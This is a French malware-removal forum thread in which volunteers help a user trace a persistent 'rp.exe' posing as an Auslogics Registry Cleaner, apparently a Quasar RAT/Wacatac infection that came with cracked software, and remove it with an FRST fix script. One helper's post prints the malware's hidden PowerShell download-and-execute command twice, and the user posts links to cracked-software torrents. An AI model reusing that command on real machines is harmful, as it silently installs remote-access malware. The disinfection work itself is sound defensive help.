Bonjour, j'ai découvert depuis quelque jours que ce truc avait apparu dans mon gestionnaire de taches. Il se nomme "Registry Cleaner (32bits)" ( il y en a 2 identiques" dans son arborescence il y a"DevExpress.Utils.Drwing" et est lié à un fichier "rp.exe" présent dans le roaming de l'APPDATA, il pèse un poil plus d'1Go est si je le supprime il se recréé à chaque démarrage.
Voici les détails du rp.exe :
J'ai inspecté le planificateur de taches et voici ce que j'y ai découvert :
J'ai supprimé la tache, mais ça n'a rien changé même si la tache ne s'est pas recréé.
Mon antivirus ne détecte rien en général ni sur ce fichier.
Dans le registre j'ai trouvé ceci :
Je l'ai supprimé mais rien n'a changé.
J'ai ça aussi je sais pas si ça donne des infos, je ne sais pas a qui est l'adresse IP :
Merci d'avance pour l'aide ! Bonne journée/soirée
EDIT j'ai ajouté les ficher FRST... il me semble qu'il y a des choses intéressante
FRST : https://pjjoint.malekal.com/files.php?i ... 13l11w11b8
Addition : https://pjjoint.malekal.com/files.php?i ... 10j7d88k10
shortcut : https://pjjoint.malekal.com/files.php?i ... 4p13g11o11
Trojan:Win32/Wacatac.H!ml : Registry Cleaner / rp.exe [résolu]
Modérateurs : Mods Windows, Helper
- Messages : 7
- Inscription : 04 sept. 2024 22:09
Trojan:Win32/Wacatac.H!ml : Registry Cleaner / rp.exe [résolu]
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
- Messages : 7
- Inscription : 04 sept. 2024 22:09
Re: Registry Cleaner / rp.exe
J'ai supprimé le fichier ini.lnk qui contenait des argument pour apparemment télécharger un truc via l'URL shortcut, actuellement le rp.exe n'apparait plus à chaque démarrage.
- Messages : 19246
- Inscription : 02 juin 2012 20:48
- Localisation : Thomas Anderson : Je suis dans et en dehors de la matrice :-)
Re: Registry Cleaner / rp.exe
Bonsoir
Malekal ou Angliique t'en diront plus mais c'est possiblement lié à
C:\Windows\System32\cmd.exe => /c cd %APPDATA% & powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('hxxps://shorturl.at/G80TT'.Replace('_',''),'rp.exe');Start 'rp.exe'& exit
Et on retrouve la tâche que tu as trouvé
System32\Tasks\fat32 => C:\Users\JusDe\AppData\Roaming\rp.exe [1073741824 2024-08-18] (Auslogics) [Fichier non signé] <==== ATTENTION
Curieux.. L'IP (VPN) fonctionne avec le Quasar RAT (Cheval de Troie d’accès à distance)
Defender a bloqué la chose (si c'est ce truc qui apparait comme "Nom : Trojan:Win32/Wacatac.H!ml" mais pas la commande Powershell
Par contre pour se camoufler il peut se déguiser en Auslogics
A la base c'est cela : https://github.com/puniaze/QuasarRAT mais c'est trompeur car c'est juste présenté comme un programme d’administration à distance légitime
Depuis il a évolué (pas la version sur Github) et déjà rien qu'en 2017 il a servi à une une attaque visant le gouvernement américain
Par contre c'est curieux que tu le détiennes, (si c'est bien celui là) parce qu'il cible rarement les particuliers
Source de l'infection : Pj dans un mail avec un document (il a normalement une double extension de type toto.docx.exe)
Mais je note que tu as programme de torrent donc si tu as téléchargé un prog avec un crack...
Malekal en dira plus peut etre
Edit : Le programme Python c'est toi qui l'a installé ? Si, non , il est venu avec le Trojan
Malekal ou Angliique t'en diront plus mais c'est possiblement lié à
C:\Windows\System32\cmd.exe => /c cd %APPDATA% & powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('hxxps://shorturl.at/G80TT'.Replace('_',''),'rp.exe');Start 'rp.exe'& exit
Et on retrouve la tâche que tu as trouvé
System32\Tasks\fat32 => C:\Users\JusDe\AppData\Roaming\rp.exe [1073741824 2024-08-18] (Auslogics) [Fichier non signé] <==== ATTENTION
Curieux.. L'IP (VPN) fonctionne avec le Quasar RAT (Cheval de Troie d’accès à distance)
Defender a bloqué la chose (si c'est ce truc qui apparait comme "Nom : Trojan:Win32/Wacatac.H!ml" mais pas la commande Powershell
Par contre pour se camoufler il peut se déguiser en Auslogics
A la base c'est cela : https://github.com/puniaze/QuasarRAT mais c'est trompeur car c'est juste présenté comme un programme d’administration à distance légitime
Depuis il a évolué (pas la version sur Github) et déjà rien qu'en 2017 il a servi à une une attaque visant le gouvernement américain
Par contre c'est curieux que tu le détiennes, (si c'est bien celui là) parce qu'il cible rarement les particuliers
Source de l'infection : Pj dans un mail avec un document (il a normalement une double extension de type toto.docx.exe)
Mais je note que tu as programme de torrent donc si tu as téléchargé un prog avec un crack...
Malekal en dira plus peut etre
Edit : Le programme Python c'est toi qui l'a installé ? Si, non , il est venu avec le Trojan
- Only Amiga... Was possible ! Lien https://forum.malekal.com/viewtopic.php?t=60830
- « Un problème sans solution est un problème mal posé. » (Albert Einstein)
- « Tous les patients mentent » (Théorème du Docteur House) Que ce soit consciemment ou inconsciemment
- Jeff Goldblum dans Informatic Park, professeur adepte de la théorie du chaos : « Vous utilisez un crack, un keygen ? Qu’est-ce qui pourrait mal tourner?? »
- Captcha : Il s'agit d'un ordinateur qui demande à un humain de prouver.. qu'il n'est pas un ordinateur ! (Les prémices du monde de demain)
- Dans le monde il y a deux sortes de gens : Ceux qui font des sauvegardes et .. Ceux qui vont faire des sauvegardes (Extrait du Credo.. Telle est la voie ! )
- « Un problème sans solution est un problème mal posé. » (Albert Einstein)
- « Tous les patients mentent » (Théorème du Docteur House) Que ce soit consciemment ou inconsciemment
- Jeff Goldblum dans Informatic Park, professeur adepte de la théorie du chaos : « Vous utilisez un crack, un keygen ? Qu’est-ce qui pourrait mal tourner?? »
- Captcha : Il s'agit d'un ordinateur qui demande à un humain de prouver.. qu'il n'est pas un ordinateur ! (Les prémices du monde de demain)
- Dans le monde il y a deux sortes de gens : Ceux qui font des sauvegardes et .. Ceux qui vont faire des sauvegardes (Extrait du Credo.. Telle est la voie ! )
- Messages : 7
- Inscription : 04 sept. 2024 22:09
Re: Registry Cleaner / rp.exe
Salut @Parisien_entraide
J'ai donc effectivement supprimé le fichier concerné et tout est ok maintenant. C'est vrai que j'ai oublié de parler du "WACATAC" ce matin il s'est passé un truc bizarre. Quand j'ai allumé mon PC juste avant d'avoir accès au pad numérique pour rentrer le code a 4 chiffres il avait déjà mis beaucoup plus de temps que d'habitude, lorsque le pad est apparu ça a pas mal ramé voir freezé, puis j'ai rentré mon code et la écran noir mais la session paraissait ouverte je crois qu'il y avait eu les sons de reconnaissance de périphérique... Et très rapidement je fais un CTRL + ALT + Suppr et je redémarre le PC -> au redémarrage c'est a ce moment qu'il y a eu l'alerte defender concernant WACATAC.
Cependant j'ai oublié de précisé que j'ai effectué tout a l'heure une restauration au 26/08 en espérance que le rp.exe disparaitrait et il n'a pas disparu mais en plus le WACATAC a encore été flag par defender.
Par contre 2eme chose tout a l'heure avant de supprimer le raccourci qui contenait la ligne de commande pour télécharger rp.exe j'ai vu que ça datait du 02/08 a 10h55, je ne sais pas si c'est "réel" comme date mais j'ai regardé mon historique firefox et je constate que le 02/08 entre 10h54 et 10h56 j'ouvre 2 mail : un résultat d'analyse d'un labo en format PDF que j'avais ouvert mais il n'y a pas de double extension visiblement et le mail d'un site de JV que je connais mais je n'avais rien ouvert donc a priori ça ne vient pas de la ? ou alors la date du fichier ne correspond a rien de "réel"
Concernant le torrent oui effectivement j'ai installé 1 logiciel cracké il y a 18 jours, c'est guitar pro, il est toujours installé avec son crack, sur le site de torrent ( francais ) dans les commentaire personne n'a signalé quoi que ce soit... Donc ça pourrait être ça mais j'ai des doutes... Est-ce qu'il y a moyen d'en être sur ?
j'ai aussi téléchargé un concert cette nuit sur un site russe, je sais pas si j'ai le droit de mettre les liens ici donc dans le doute je met rien mais c'est la première fois que je téléchargeais sur ce site, c'est une vidéo en mkv elle contient bien le concert , tout marche nickel, je sais pas si on peut transmettre des malware dans des fichiers mkv réel qui fonctionne, même si c'est russe le site a l'air ok, y'a des commentaire qui paraissent réel...
Ce sont les 2 seuls torrent que j'ai téléchargé ces 3 derniers mois.
Concernant les programmes python si tu parles de la liste finaltone.py, device.py.... oui tout ça sont des script que j'ai écris moi même.
J'ai donc effectivement supprimé le fichier concerné et tout est ok maintenant. C'est vrai que j'ai oublié de parler du "WACATAC" ce matin il s'est passé un truc bizarre. Quand j'ai allumé mon PC juste avant d'avoir accès au pad numérique pour rentrer le code a 4 chiffres il avait déjà mis beaucoup plus de temps que d'habitude, lorsque le pad est apparu ça a pas mal ramé voir freezé, puis j'ai rentré mon code et la écran noir mais la session paraissait ouverte je crois qu'il y avait eu les sons de reconnaissance de périphérique... Et très rapidement je fais un CTRL + ALT + Suppr et je redémarre le PC -> au redémarrage c'est a ce moment qu'il y a eu l'alerte defender concernant WACATAC.
Cependant j'ai oublié de précisé que j'ai effectué tout a l'heure une restauration au 26/08 en espérance que le rp.exe disparaitrait et il n'a pas disparu mais en plus le WACATAC a encore été flag par defender.
Par contre 2eme chose tout a l'heure avant de supprimer le raccourci qui contenait la ligne de commande pour télécharger rp.exe j'ai vu que ça datait du 02/08 a 10h55, je ne sais pas si c'est "réel" comme date mais j'ai regardé mon historique firefox et je constate que le 02/08 entre 10h54 et 10h56 j'ouvre 2 mail : un résultat d'analyse d'un labo en format PDF que j'avais ouvert mais il n'y a pas de double extension visiblement et le mail d'un site de JV que je connais mais je n'avais rien ouvert donc a priori ça ne vient pas de la ? ou alors la date du fichier ne correspond a rien de "réel"
Concernant le torrent oui effectivement j'ai installé 1 logiciel cracké il y a 18 jours, c'est guitar pro, il est toujours installé avec son crack, sur le site de torrent ( francais ) dans les commentaire personne n'a signalé quoi que ce soit... Donc ça pourrait être ça mais j'ai des doutes... Est-ce qu'il y a moyen d'en être sur ?
j'ai aussi téléchargé un concert cette nuit sur un site russe, je sais pas si j'ai le droit de mettre les liens ici donc dans le doute je met rien mais c'est la première fois que je téléchargeais sur ce site, c'est une vidéo en mkv elle contient bien le concert , tout marche nickel, je sais pas si on peut transmettre des malware dans des fichiers mkv réel qui fonctionne, même si c'est russe le site a l'air ok, y'a des commentaire qui paraissent réel...
Ce sont les 2 seuls torrent que j'ai téléchargé ces 3 derniers mois.
Concernant les programmes python si tu parles de la liste finaltone.py, device.py.... oui tout ça sont des script que j'ai écris moi même.
i | Edit par Parisien_Entraide 1) Dès lors que tu es en analyse TU NE TOUCHES A RIEN Là c'est comme si tu prenais RDV au garagiste de la marque de ta voiture pour des dysfonctionnements que tu penses avoir isolés, et qu'avant de t'y rendre tu changeais toi même les pièces en espérant que... Le garagiste ne comprendra plus rien, aura du mal à trouver la source du problème et aura du mal à le résoudre C'est du même ordre que de passer un tas d'outils dits de désinfection avant de venir dans un forum de désinfection. Ca cache ou fait disparaitre des données liée à l'infection pour l'identifier, et EN PLUS cela peut amener des dysfonctionnements Sur les cracks lis bien ce lien (Et avant ou après ce qui figure) POUR LES CRACKS (tu parles de Guitar PRO mais tu as aussi ABLETON.. Il est cracké aussi ?) viewtopic.php?p=544690#p544690 (où tu verras que les commentaires, c'est comme sur nombre de site c'est majoritairement .. Bidons) C'est quoi ton site de téléchargement (mets hxxps au lieu de https devant) Et pourquoi ca passe kaspersky trou raquette viewtopic.php?p=541514#p541514 |
- Messages : 116929
- Inscription : 10 sept. 2005 13:57
Re: Registry Cleaner / rp.exe
Bonjour,
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)
Important :
Le contenu de la correction ne doit pas être vide et doit refléter le script donné précédemment.
Dans le cas où la correction est vide, essaye de faire la correction FRST comme ceci :
Place le programme FRST sur le bureau
Ouvre le bloc-note.
Colle le script donné plus haut.
Enregistre le fichier sur le sur le bureau de Windows (pas ailleurs) sous le nom de fixlist.txt.
Relance FRST puis Corriger.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
Code : Tout sélectionner
Start:
CloseProcesses:
CreateRestorePoint:
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ini.lnk [2024-08-02]
Task: {CEE994DE-08BF-45BE-AA51-B25EAAF3CC9C} - System32\Tasks\fat32 => C:\Users\JusDe\AppData\Roaming\rp.exe [1073741824 2024-08-18] (Auslogics) [Fichier non signé] <==== ATTENTION
2024-08-18 10:53 - 2024-09-04 02:33 - 000000000 ___HD C:\Users\JusDe\AppData\Roaming\Multi
2024-08-18 10:46 - 2024-08-18 10:46 - 000000000 _____ C:\ProgramData\__.exe
2024-08-18 09:49 - 2024-08-18 09:49 - 000003320 _____ C:\WINDOWS\system32\Tasks\fat32
2024-08-18 09:47 - 2024-08-18 09:47 - 1073741824 _____ (Auslogics) C:\Users\JusDe\AppData\Roaming\rp.exe
2024-09-04 20:47 - 2024-09-04 20:47 - 000000000 ____D C:\AdwCleaner
2024-09-03 23:16 - 2024-09-04 01:03 - 000000451 _____ C:\Users\JusDe\AppData\Roaming\tempp4nd0r4
2024-09-03 23:16 - 2024-09-04 01:03 - 000000100 _____ C:\Users\JusDe\AppData\Roaming\tempp4nd0r4on
2024-09-03 21:59 - 2024-09-03 21:59 - 000000010 _____ C:\Users\JusDe\AppData\Roaming\temp0923
2024-09-03 21:35 - 2024-09-04 21:40 - 000000000 ____D C:\FirefoxAutomationData
2024-09-01 13:36 - 2024-09-02 00:06 - 000000000 ___HD C:\Users\JusDe\AppData\Roaming\arc
2024-08-29 14:01 - 2024-08-29 14:01 - 000000158 _____ C:\Users\JusDe\AppData\Local\kritadisplayrc
2024-08-25 10:32 - 2024-08-26 00:02 - 000000000 ___HD C:\Users\JusDe\AppData\Roaming\fr.xlm
RemoveProxy:
Reboot:
End:
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)
Important :
Le contenu de la correction ne doit pas être vide et doit refléter le script donné précédemment.
Dans le cas où la correction est vide, essaye de faire la correction FRST comme ceci :
Place le programme FRST sur le bureau
Ouvre le bloc-note.
Colle le script donné plus haut.
Enregistre le fichier sur le sur le bureau de Windows (pas ailleurs) sous le nom de fixlist.txt.
Relance FRST puis Corriger.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Evaluer le site malekal.com
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Evaluer le site malekal.com
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
- Messages : 7
- Inscription : 04 sept. 2024 22:09
Re: Trojan:Win32/Wacatac.H!ml : Registry Cleaner / rp.exe
Voila c'est fait, merci de l'aide !
- Messages : 19246
- Inscription : 02 juin 2012 20:48
- Localisation : Thomas Anderson : Je suis dans et en dehors de la matrice :-)
Re: Trojan:Win32/Wacatac.H!ml : Registry Cleaner / rp.exe
Bonjour
- Relis ce qui est en "bleu" dans ton message
- Relis ce que Malekal a indiqué
- Relis ce qui est en "bleu" dans ton message
- Relis ce que Malekal a indiqué
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
- Only Amiga... Was possible ! Lien https://forum.malekal.com/viewtopic.php?t=60830
- « Un problème sans solution est un problème mal posé. » (Albert Einstein)
- « Tous les patients mentent » (Théorème du Docteur House) Que ce soit consciemment ou inconsciemment
- Jeff Goldblum dans Informatic Park, professeur adepte de la théorie du chaos : « Vous utilisez un crack, un keygen ? Qu’est-ce qui pourrait mal tourner?? »
- Captcha : Il s'agit d'un ordinateur qui demande à un humain de prouver.. qu'il n'est pas un ordinateur ! (Les prémices du monde de demain)
- Dans le monde il y a deux sortes de gens : Ceux qui font des sauvegardes et .. Ceux qui vont faire des sauvegardes (Extrait du Credo.. Telle est la voie ! )
- « Un problème sans solution est un problème mal posé. » (Albert Einstein)
- « Tous les patients mentent » (Théorème du Docteur House) Que ce soit consciemment ou inconsciemment
- Jeff Goldblum dans Informatic Park, professeur adepte de la théorie du chaos : « Vous utilisez un crack, un keygen ? Qu’est-ce qui pourrait mal tourner?? »
- Captcha : Il s'agit d'un ordinateur qui demande à un humain de prouver.. qu'il n'est pas un ordinateur ! (Les prémices du monde de demain)
- Dans le monde il y a deux sortes de gens : Ceux qui font des sauvegardes et .. Ceux qui vont faire des sauvegardes (Extrait du Credo.. Telle est la voie ! )
- Messages : 7
- Inscription : 04 sept. 2024 22:09
Re: Trojan:Win32/Wacatac.H!ml : Registry Cleaner / rp.exe
Pardon effectivement, après j'avais tout supprimé à la main cette nuit donc rien n'a été trouvé mais effectivement j'aurai du attendre dsl, je vous refais un FRST mais je pense pas que cela soit utile. Par contre la restauration je l'ai faite avant de poster mes messages, mais ce qui est étonnant c'est que le FRST mentionne pas le WACATAC qui est apparu a la première connexion d'après la restau, je ne sais pas si c'est un comportement normal.
Voici le lien du torrent ( c'est privé maintenant donc jsp si vous pourrez y avoir accès ) :
hxxps://www.ygg.re/torrent/application/windows/1205725-guitar-pro-v8-1-2-32-win-multi-crack
Il y a 3 mois j'ai aussi cracké photoshop :
hxxps://www.ygg.re/torrent/application/windows/1177795-adobe-photoshop-2024-v25-9-0-573---m0nkrus-win-x64-multi-precracke
Ce sont les seuls crack que j'ai utilisé sur cette install, aucun jeu ou autre soft. Ableton est legit.
Les nouveau FRST si jamais :
https://pjjoint.malekal.com/files.php?i ... 13c15o5v11
https://pjjoint.malekal.com/files.php?i ... x14v9m14d9
https://pjjoint.malekal.com/files.php?i ... 4u5e15i8y7
Merci encore pour le temps consacrés !
Le fichier demandé :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 22-08.2024
Exécuté par JusDe (05-09-2024 09:34:58) Run:1
Exécuté depuis D:\Dropbox\Dropbox\Documents\Bureau
Profils chargés: JusDe
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
̩Start:
CloseProcesses:
CreateRestorePoint:
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ini.lnk [2024-08-02]
Task: {CEE994DE-08BF-45BE-AA51-B25EAAF3CC9C} - System32\Tasks\fat32 => C:\Users\JusDe\AppData\Roaming\rp.exe [1073741824 2024-08-18] (Auslogics) [Fichier non signé] <==== ATTENTION
2024-08-18 10:53 - 2024-09-04 02:33 - 000000000 ___HD C:\Users\JusDe\AppData\Roaming\Multi
2024-08-18 10:46 - 2024-08-18 10:46 - 000000000 _____ C:\ProgramData\__.exe
2024-08-18 09:49 - 2024-08-18 09:49 - 000003320 _____ C:\WINDOWS\system32\Tasks\fat32
2024-08-18 09:47 - 2024-08-18 09:47 - 1073741824 _____ (Auslogics) C:\Users\JusDe\AppData\Roaming\rp.exe
2024-09-04 20:47 - 2024-09-04 20:47 - 000000000 ____D C:\AdwCleaner
2024-09-03 23:16 - 2024-09-04 01:03 - 000000451 _____ C:\Users\JusDe\AppData\Roaming\tempp4nd0r4
2024-09-03 23:16 - 2024-09-04 01:03 - 000000100 _____ C:\Users\JusDe\AppData\Roaming\tempp4nd0r4on
2024-09-03 21:59 - 2024-09-03 21:59 - 000000010 _____ C:\Users\JusDe\AppData\Roaming\temp0923
2024-09-03 21:35 - 2024-09-04 21:40 - 000000000 ____D C:\FirefoxAutomationData
2024-09-01 13:36 - 2024-09-02 00:06 - 000000000 ___HD C:\Users\JusDe\AppData\Roaming\arc
2024-08-29 14:01 - 2024-08-29 14:01 - 000000158 _____ C:\Users\JusDe\AppData\Local\kritadisplayrc
2024-08-25 10:32 - 2024-08-26 00:02 - 000000000 ___HD C:\Users\JusDe\AppData\Roaming\fr.xlm
RemoveProxy:
Reboot:
End:
*****************
Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ini.lnk" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CEE994DE-08BF-45BE-AA51-B25EAAF3CC9C}" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\fat32" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\fat32" => non trouvé(e)
"C:\Users\JusDe\AppData\Roaming\Multi" Dossier déplacer:
C:\Users\JusDe\AppData\Roaming\Multi => déplacé(es) avec succès
"C:\ProgramData\__.exe" => non trouvé(e)
"C:\WINDOWS\system32\Tasks\fat32" => non trouvé(e)
"C:\Users\JusDe\AppData\Roaming\rp.exe" => non trouvé(e)
"C:\AdwCleaner" Dossier déplacer:
C:\AdwCleaner => déplacé(es) avec succès
C:\Users\JusDe\AppData\Roaming\tempp4nd0r4 => déplacé(es) avec succès
C:\Users\JusDe\AppData\Roaming\tempp4nd0r4on => déplacé(es) avec succès
C:\Users\JusDe\AppData\Roaming\temp0923 => déplacé(es) avec succès
"C:\FirefoxAutomationData" Dossier déplacer:
C:\FirefoxAutomationData => déplacé(es) avec succès
"C:\Users\JusDe\AppData\Roaming\arc" Dossier déplacer:
C:\Users\JusDe\AppData\Roaming\arc => déplacé(es) avec succès
C:\Users\JusDe\AppData\Local\kritadisplayrc => déplacé(es) avec succès
"C:\Users\JusDe\AppData\Roaming\fr.xlm" Dossier déplacer:
C:\Users\JusDe\AppData\Roaming\fr.xlm => déplacé(es) avec succès
========= RemoveProxy: =========
========= Fin de RemoveProxy: =========
Le système a dû redémarrer.
==== Fin de Fixlog 09:36:37 ====
Voici le lien du torrent ( c'est privé maintenant donc jsp si vous pourrez y avoir accès ) :
hxxps://www.ygg.re/torrent/application/windows/1205725-guitar-pro-v8-1-2-32-win-multi-crack
Il y a 3 mois j'ai aussi cracké photoshop :
hxxps://www.ygg.re/torrent/application/windows/1177795-adobe-photoshop-2024-v25-9-0-573---m0nkrus-win-x64-multi-precracke
Ce sont les seuls crack que j'ai utilisé sur cette install, aucun jeu ou autre soft. Ableton est legit.
Les nouveau FRST si jamais :
https://pjjoint.malekal.com/files.php?i ... 13c15o5v11
https://pjjoint.malekal.com/files.php?i ... x14v9m14d9
https://pjjoint.malekal.com/files.php?i ... 4u5e15i8y7
Merci encore pour le temps consacrés !
Le fichier demandé :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 22-08.2024
Exécuté par JusDe (05-09-2024 09:34:58) Run:1
Exécuté depuis D:\Dropbox\Dropbox\Documents\Bureau
Profils chargés: JusDe
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
̩Start:
CloseProcesses:
CreateRestorePoint:
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ini.lnk [2024-08-02]
Task: {CEE994DE-08BF-45BE-AA51-B25EAAF3CC9C} - System32\Tasks\fat32 => C:\Users\JusDe\AppData\Roaming\rp.exe [1073741824 2024-08-18] (Auslogics) [Fichier non signé] <==== ATTENTION
2024-08-18 10:53 - 2024-09-04 02:33 - 000000000 ___HD C:\Users\JusDe\AppData\Roaming\Multi
2024-08-18 10:46 - 2024-08-18 10:46 - 000000000 _____ C:\ProgramData\__.exe
2024-08-18 09:49 - 2024-08-18 09:49 - 000003320 _____ C:\WINDOWS\system32\Tasks\fat32
2024-08-18 09:47 - 2024-08-18 09:47 - 1073741824 _____ (Auslogics) C:\Users\JusDe\AppData\Roaming\rp.exe
2024-09-04 20:47 - 2024-09-04 20:47 - 000000000 ____D C:\AdwCleaner
2024-09-03 23:16 - 2024-09-04 01:03 - 000000451 _____ C:\Users\JusDe\AppData\Roaming\tempp4nd0r4
2024-09-03 23:16 - 2024-09-04 01:03 - 000000100 _____ C:\Users\JusDe\AppData\Roaming\tempp4nd0r4on
2024-09-03 21:59 - 2024-09-03 21:59 - 000000010 _____ C:\Users\JusDe\AppData\Roaming\temp0923
2024-09-03 21:35 - 2024-09-04 21:40 - 000000000 ____D C:\FirefoxAutomationData
2024-09-01 13:36 - 2024-09-02 00:06 - 000000000 ___HD C:\Users\JusDe\AppData\Roaming\arc
2024-08-29 14:01 - 2024-08-29 14:01 - 000000158 _____ C:\Users\JusDe\AppData\Local\kritadisplayrc
2024-08-25 10:32 - 2024-08-26 00:02 - 000000000 ___HD C:\Users\JusDe\AppData\Roaming\fr.xlm
RemoveProxy:
Reboot:
End:
*****************
Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ini.lnk" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CEE994DE-08BF-45BE-AA51-B25EAAF3CC9C}" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\fat32" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\fat32" => non trouvé(e)
"C:\Users\JusDe\AppData\Roaming\Multi" Dossier déplacer:
C:\Users\JusDe\AppData\Roaming\Multi => déplacé(es) avec succès
"C:\ProgramData\__.exe" => non trouvé(e)
"C:\WINDOWS\system32\Tasks\fat32" => non trouvé(e)
"C:\Users\JusDe\AppData\Roaming\rp.exe" => non trouvé(e)
"C:\AdwCleaner" Dossier déplacer:
C:\AdwCleaner => déplacé(es) avec succès
C:\Users\JusDe\AppData\Roaming\tempp4nd0r4 => déplacé(es) avec succès
C:\Users\JusDe\AppData\Roaming\tempp4nd0r4on => déplacé(es) avec succès
C:\Users\JusDe\AppData\Roaming\temp0923 => déplacé(es) avec succès
"C:\FirefoxAutomationData" Dossier déplacer:
C:\FirefoxAutomationData => déplacé(es) avec succès
"C:\Users\JusDe\AppData\Roaming\arc" Dossier déplacer:
C:\Users\JusDe\AppData\Roaming\arc => déplacé(es) avec succès
C:\Users\JusDe\AppData\Local\kritadisplayrc => déplacé(es) avec succès
"C:\Users\JusDe\AppData\Roaming\fr.xlm" Dossier déplacer:
C:\Users\JusDe\AppData\Roaming\fr.xlm => déplacé(es) avec succès
========= RemoveProxy: =========
========= Fin de RemoveProxy: =========
Le système a dû redémarrer.
==== Fin de Fixlog 09:36:37 ====
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
- Messages : 7
- Inscription : 04 sept. 2024 22:09
Re: Trojan:Win32/Wacatac.H!ml : Registry Cleaner / rp.exe
EDIT :
Je viens de capter un truc c'est que mon install guitar pro fais lien avec la date de ces fichiers :
2024-08-18 10:46 - 2024-08-18 10:46 - 000000000 _____ C:\ProgramData\__.exe
2024-08-18 09:49 - 2024-08-18 09:49 - 000003320 _____ C:\WINDOWS\system32\Tasks\fat32
2024-08-18 09:47 - 2024-08-18 09:47 - 1073741824 _____ (Auslogics) C:\Users\JusDe\AppData\Roaming\rp.exe
Je viens de capter un truc c'est que mon install guitar pro fais lien avec la date de ces fichiers :
2024-08-18 10:46 - 2024-08-18 10:46 - 000000000 _____ C:\ProgramData\__.exe
2024-08-18 09:49 - 2024-08-18 09:49 - 000003320 _____ C:\WINDOWS\system32\Tasks\fat32
2024-08-18 09:47 - 2024-08-18 09:47 - 1073741824 _____ (Auslogics) C:\Users\JusDe\AppData\Roaming\rp.exe
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
- Messages : 116929
- Inscription : 10 sept. 2005 13:57
Re: Trojan:Win32/Wacatac.H!ml : Registry Cleaner / rp.exe [résolu]
Les joies des téléchargements de fichiers non sûrs.
Je pense que c'est bon pour la désinfection.
Supprime C:\FRST et ses restes.
Ca ne sert à rien d'utiliser AdwCleaner et ZHPCleaner quand on a un Trojan ou pour vérifier son PC.
~~
A lire : que faire après une attaque de virus informatique.
Change tes mots de passe et assure toi que Windows Defender fonctionne correctement.
Pour éviter les virus, il faut savoir comment les pirates s'y prennent pour infecter les ordinateurs : Comment les virus informatiques sont distribués
Enfin pour protéger ton PC : Comment protéger son PC des virus et des pirates ?
Si l'aide t'a contenu ou si les tutoriels du site t'ont aidé, tu peux prendre le temps d'évaluer le site sur Bing, ce serait sympa : Evaluer le site malekal.com
Je pense que c'est bon pour la désinfection.
Supprime C:\FRST et ses restes.
Ca ne sert à rien d'utiliser AdwCleaner et ZHPCleaner quand on a un Trojan ou pour vérifier son PC.
~~
A lire : que faire après une attaque de virus informatique.
Change tes mots de passe et assure toi que Windows Defender fonctionne correctement.
Pour éviter les virus, il faut savoir comment les pirates s'y prennent pour infecter les ordinateurs : Comment les virus informatiques sont distribués
Enfin pour protéger ton PC : Comment protéger son PC des virus et des pirates ?
Si l'aide t'a contenu ou si les tutoriels du site t'ont aidé, tu peux prendre le temps d'évaluer le site sur Bing, ce serait sympa : Evaluer le site malekal.com
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Evaluer le site malekal.com
